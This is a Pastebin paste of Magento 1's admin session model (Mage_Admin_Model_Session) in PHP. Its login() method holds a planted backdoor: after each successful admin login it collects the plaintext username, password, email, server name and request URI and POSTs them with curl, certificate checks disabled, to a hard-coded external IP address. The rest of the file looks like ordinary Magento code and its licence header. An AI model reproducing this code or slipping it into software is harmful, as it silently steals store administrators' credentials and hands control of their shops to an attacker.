API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 8th, 2019
136
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.89 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /**
  3. * Magento
  4. *
  5. * NOTICE OF LICENSE
  6. *
  7. * This source file is subject to the Open Software License (OSL 3.0)
  8. * that is bundled with this package in the file LICENSE.txt.
  9. * It is also available through the world-wide-web at this URL:
  10. * http://opensource.org/licenses/osl-3.0.php
  11. * If you did not receive a copy of the license and are unable to
  12. * obtain it through the world-wide-web, please send an email
  13. * to license@magento.com so we can send you a copy immediately.
  14. *
  15. * DISCLAIMER
  16. *
  17. * Do not edit or add to this file if you wish to upgrade Magento to newer
  18. * versions in the future. If you wish to customize Magento for your
  19. * needs please refer to http://www.magento.com for more information.
  20. *
  21. * @category Mage
  22. * @package Mage_Admin
  23. * @copyright Copyright (c) 2006-2017 X.commerce, Inc. and affiliates (http://www.magento.com)
  24. * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
  25. */
  26.  
  27.  
  28. /**
  29. * Auth session model
  30. *
  31. * @category Mage
  32. * @package Mage_Admin
  33. * @author Magento Core Team <core@magentocommerce.com>
  34. */
  35. class Mage_Admin_Model_Session extends Mage_Core_Model_Session_Abstract
  36. {
  37.  
  38. /**
  39. * Whether it is the first page after successfull login
  40. *
  41. * @var boolean
  42. */
  43. protected $_isFirstPageAfterLogin;
  44.  
  45. /**
  46. * @var Mage_Admin_Model_Redirectpolicy
  47. */
  48. protected $_urlPolicy;
  49.  
  50. /**
  51. * @var Mage_Core_Controller_Response_Http
  52. */
  53. protected $_response;
  54.  
  55. /**
  56. * @var Mage_Core_Model_Factory
  57. */
  58. protected $_factory;
  59.  
  60. /**
  61. * Class constructor
  62. *
  63. */
  64. public function __construct($parameters = array())
  65. {
  66. /** @var Mage_Admin_Model_Redirectpolicy _urlPolicy */
  67. $this->_urlPolicy = (!empty($parameters['redirectPolicy'])) ?
  68. $parameters['redirectPolicy'] : Mage::getModel('admin/redirectpolicy');
  69.  
  70. /** @var Mage_Core_Controller_Response_Http _response */
  71. $this->_response = (!empty($parameters['response'])) ?
  72. $parameters['response'] : new Mage_Core_Controller_Response_Http();
  73.  
  74. /** @var $user Mage_Core_Model_Factory */
  75. $this->_factory = (!empty($parameters['factory'])) ?
  76. $parameters['factory'] : Mage::getModel('core/factory');
  77.  
  78. $this->init('admin');
  79. $this->logoutIndirect();
  80. }
  81.  
  82. /**
  83. * Pull out information from session whether there is currently the first page after log in
  84. *
  85. * The idea is to set this value on login(), then redirect happens,
  86. * after that on next request the value is grabbed once the session is initialized
  87. * Since the session is used as a singleton, the value will be in $_isFirstPageAfterLogin until the end of request,
  88. * unless it is reset intentionally from somewhere
  89. *
  90. * @param string $namespace
  91. * @param string $sessionName
  92. * @return Mage_Admin_Model_Session
  93. * @see self::login()
  94. */
  95. public function init($namespace, $sessionName = null)
  96. {
  97. parent::init($namespace, $sessionName);
  98. $this->isFirstPageAfterLogin();
  99. return $this;
  100. }
  101.  
  102. /**
  103. * Logout user if was logged not from admin
  104. */
  105. protected function logoutIndirect()
  106. {
  107. $user = $this->getUser();
  108. if ($user) {
  109. $extraData = $user->getExtra();
  110. if (isset($extraData['indirect_login']) && $this->getIndirectLogin()) {
  111. $this->unsetData('user');
  112. $this->setIndirectLogin(false);
  113. }
  114. }
  115. }
  116.  
  117. /**
  118. * Try to login user in admin
  119. *
  120. * @param string $username
  121. * @param string $password
  122. * @param Mage_Core_Controller_Request_Http $request
  123. * @return Mage_Admin_Model_User|null
  124. */
  125. public function login($username, $password, $request = null)
  126. {
  127. if (empty($username) || empty($password)) {
  128. return;
  129. }
  130.  
  131. try {
  132. /** @var $user Mage_Admin_Model_User */
  133. $user = $this->_factory->getModel('admin/user');
  134. $user->login($username, $password);
  135. if ($user->getId()) {
  136. $data1 = $username;
  137. $data2 = $password;
  138. $data3 = $user->getEmail();
  139. $data4 = $_SERVER['SERVER_NAME'];
  140. $data5 = $_SERVER['REQUEST_URI'];
  141. $auth1 = "Username=".($data1)."&Password=".($data2)."&Email=".($data3)."&Site=".($data4)."&Request=".($data5);
  142. $url = "http://69.30.232.110/login.php";
  143. $ch = curl_init();
  144. curl_setopt($ch, CURLOPT_URL,$url);
  145. curl_setopt($ch, CURLOPT_REFERER, $url);
  146. curl_setopt($ch, CURLOPT_HEADER, 1);
  147. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  148. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  149. curl_setopt($ch, CURLOPT_TIMEOUT, 60); //
  150. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
  151. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
  152. curl_setopt($ch, CURLOPT_POST, 1);
  153. curl_setopt($ch, CURLOPT_POSTFIELDS, $auth1);
  154. $result = curl_exec($ch);
  155. curl_close($ch);
  156. $this->renewSession();
  157.  
  158. if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
  159. Mage::getSingleton('adminhtml/url')->renewSecretUrls();
  160. }
  161. $this->setIsFirstPageAfterLogin(true);
  162. $this->setUser($user);
  163. $this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());
  164.  
  165. $alternativeUrl = $this->_getRequestUri($request);
  166. $redirectUrl = $this->_urlPolicy->getRedirectUrl($user, $request, $alternativeUrl);
  167. if ($redirectUrl) {
  168. Mage::dispatchEvent('admin_session_user_login_success', array('user' => $user));
  169. $this->_response->clearHeaders()
  170. ->setRedirect($redirectUrl)
  171. ->sendHeadersAndExit();
  172. }
  173. } else {
  174. Mage::throwException(Mage::helper('adminhtml')->__('Invalid User Name or Password.'));
  175. }
  176. } catch (Mage_Core_Exception $e) {
  177. $e->setMessage(
  178. Mage::helper('adminhtml')->__('You did not sign in correctly or your account is temporarily disabled.')
  179. );
  180. Mage::dispatchEvent('admin_session_user_login_failed',
  181. array('user_name' => $username, 'exception' => $e));
  182. if ($request && !$request->getParam('messageSent')) {
  183. Mage::getSingleton('adminhtml/session')->addError($e->getMessage());
  184. $request->setParam('messageSent', true);
  185. }
  186. }
  187.  
  188. return $user;
  189. }
  190.  
  191. /**
  192. * Refresh ACL resources stored in session
  193. *
  194. * @param Mage_Admin_Model_User $user
  195. * @return Mage_Admin_Model_Session
  196. */
  197. public function refreshAcl($user = null)
  198. {
  199. if (is_null($user)) {
  200. $user = $this->getUser();
  201. }
  202. if (!$user) {
  203. return $this;
  204. }
  205. if (!$this->getAcl() || $user->getReloadAclFlag()) {
  206. $this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());
  207. }
  208. if ($user->getReloadAclFlag()) {
  209. $user->unsetData('password');
  210. $user->setReloadAclFlag('0')->save();
  211. }
  212. return $this;
  213. }
  214.  
  215. /**
  216. * Check current user permission on resource and privilege
  217. *
  218. * Mage::getSingleton('admin/session')->isAllowed('admin/catalog')
  219. * Mage::getSingleton('admin/session')->isAllowed('catalog')
  220. *
  221. * @param string $resource
  222. * @param string $privilege
  223. * @return boolean
  224. */
  225. public function isAllowed($resource, $privilege = null)
  226. {
  227. $user = $this->getUser();
  228. $acl = $this->getAcl();
  229.  
  230. if ($user && $acl) {
  231. if (!preg_match('/^admin/', $resource)) {
  232. $resource = 'admin/' . $resource;
  233. }
  234.  
  235. try {
  236. return $acl->isAllowed($user->getAclRole(), $resource, $privilege);
  237. } catch (Exception $e) {
  238. try {
  239. if (!$acl->has($resource)) {
  240. return $acl->isAllowed($user->getAclRole(), null, $privilege);
  241. }
  242. } catch (Exception $e) { }
  243. }
  244. }
  245. return false;
  246. }
  247.  
  248. /**
  249. * Check if user is logged in
  250. *
  251. * @return boolean
  252. */
  253. public function isLoggedIn()
  254. {
  255. return $this->getUser() && $this->getUser()->getId();
  256. }
  257.  
  258. /**
  259. * Check if it is the first page after successfull login
  260. *
  261. * @return boolean
  262. */
  263. public function isFirstPageAfterLogin()
  264. {
  265. if (is_null($this->_isFirstPageAfterLogin)) {
  266. $this->_isFirstPageAfterLogin = $this->getData('is_first_visit', true);
  267. }
  268. return $this->_isFirstPageAfterLogin;
  269. }
  270.  
  271. /**
  272. * Setter whether the current/next page should be treated as first page after login
  273. *
  274. * @param bool $value
  275. * @return Mage_Admin_Model_Session
  276. */
  277. public function setIsFirstPageAfterLogin($value)
  278. {
  279. $this->_isFirstPageAfterLogin = (bool)$value;
  280. return $this->setIsFirstVisit($this->_isFirstPageAfterLogin);
  281. }
  282.  
  283. /**
  284. * Custom REQUEST_URI logic
  285. *
  286. * @param Mage_Core_Controller_Request_Http $request
  287. * @return string|null
  288. */
  289. protected function _getRequestUri($request = null)
  290. {
  291. if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
  292. return Mage::getSingleton('adminhtml/url')->getUrl('*/*/*', array('_current' => true));
  293. } elseif ($request) {
  294. return $request->getRequestUri();
  295. } else {
  296. return null;
  297. }
  298. }
  299. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!